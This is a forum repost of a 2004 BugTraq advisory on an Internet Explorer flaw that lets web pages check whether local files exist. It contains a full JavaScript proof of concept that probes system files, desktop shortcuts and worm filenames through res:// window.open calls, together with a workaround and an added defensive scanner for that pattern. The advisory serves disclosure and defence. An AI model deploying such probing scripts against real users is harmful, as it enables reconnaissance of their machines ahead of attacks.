[Info] Explorer is vulnerable USE MOZILLA FIREFOX

09/11/2004 - 14:50 by hptella
BUGTRAQ ARCHIVE


To: BugTraq
Subject: Microsoft Internet Explorer permits to examine the existence of
local files
Date: Nov 6 2004 9:29PM
Author: Benjamin Tobias Franz <0-1-2-3 gmx de>
Message-ID: <009301c4c447$df718f20$b6eeb9d9@oemcomputer>

Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer which allows
checking for the existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs because Microsoft Internet Explorer does not open a window
if the target file exists, but it will open a window if the file does not
exist.
An attacker can also use this "feature" to verify the existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="&gt; Search &gt;"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search");}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!";
else return "'"+btfp+"' does NOT exist!";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...";
btfd+=btfc("autoexec.bat");
btfd+=btfc("msdos.sys");
btfd+=btfc("twain.dll");
btfd+=btfc("swflash.ocx");
btfd+=btfc("shell32.dll");
btfd+=btfc("test.txt");
btfd+=btfc("test.btf");
btfd+="Search for shortcut files (on desktop) ...";
btfd+=btfc("Microsoft Word.lnk");
btfd+=btfc("IrfanView.lnk");
btfd+=btfc("Opera.lnk");
btfd+=btfc("Mozilla.lnk");
btfd+=btfc("Netscape 6.lnk");
btfd+=btfc("Netscape 7.lnk");
btfd+=btfc("btf.lnk");
btfd+="Search for virus/worm files ...";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe");
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx");
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr");
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr");
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr");
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr");
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr");
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ");
btfd+=btfv+"Klez' : "+btfc("wqk.exe");
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe");
btfd+=btfv+"Maldal' : "+btfc("win.exe");
btfd+=btfv+"Gokar' : "+btfc("karen.exe");

// ...

document.all.btft.value="Copyright (C) 2004 by Benjamin Tobias Franz (0-1-2-3 gmx de)"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany


Want to link to this message? Use this URL:
<http://www.securityfocus.com/archive/1/380541>
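
A defender-side check for the pattern the proof of concept above relies on, as an added example that is not part of the original message: it scans a page's inline scripts for open() calls on a local-resource URL scheme and notes whether the call sits inside a try block, which is how the script tells "window opened" from "exception thrown". The names LOCAL_SCHEMES, SAMPLE_PAGE, inlineScripts and findLocalOpenProbes, the choice of schemes, and the sample page are assumptions made for this example.

```javascript
// Added example: heuristic scan of inline scripts for window.open() on a
// local-resource scheme inside try{}, the shape used to test file existence.
const LOCAL_SCHEMES = ["res:", "file:"]; // assumption: schemes worth flagging

// Constructed sample page: one probing script, one ordinary pop-up.
const SAMPLE_PAGE = [
  "<html><body>",
  "<script>",
  "function probe(name){",
  "  var hit=0;",
  "  try{window.open(\"res://\"+name,\"_search\");}",
  "  catch(e){hit=1;}",
  "  return hit;",
  "}",
  "</script>",
  "<script>window.open('https://example.com/help');</script>",
  "</body></html>",
].join("\n");

// Return the body of every inline <script> element in an HTML string.
function inlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Report each open() call whose URL literal starts with a local scheme.
// inTry is true when an unclosed "try {" precedes the call (brace heuristic).
function findLocalOpenProbes(html) {
  const call = /\b(?:window\.)?open\s*\(\s*["']([a-z][a-z0-9+.-]*:)\/\//gi;
  const findings = [];
  for (const src of inlineScripts(html)) {
    let m;
    while ((m = call.exec(src)) !== null) {
      const scheme = m[1].toLowerCase();
      if (!LOCAL_SCHEMES.includes(scheme)) continue;
      const before = src.slice(0, m.index);
      findings.push({
        scheme,
        inTry: /try\s*\{[^}]*$/.test(before),
        line: before.split("\n").length, // line within the script element
      });
    }
  }
  return findings;
}

console.log(findLocalOpenProbes(SAMPLE_PAGE));
```

The try-block test is a brace heuristic, so a finding is a prompt for manual review of the script rather than a verdict.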
 

Read the replies

#1 JM Tella Llop [MVP Windows]
09/11/2004 - 20:04
Jose Manuel Tella Llop
MVP - Windows
(remove XXX)
http://www.multingles.net/jmt.htm

This message is provided "as is" without warranties of any kind, and confers no rights.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.



"HP Tella Llop [MVI Windows[" wrote in message news: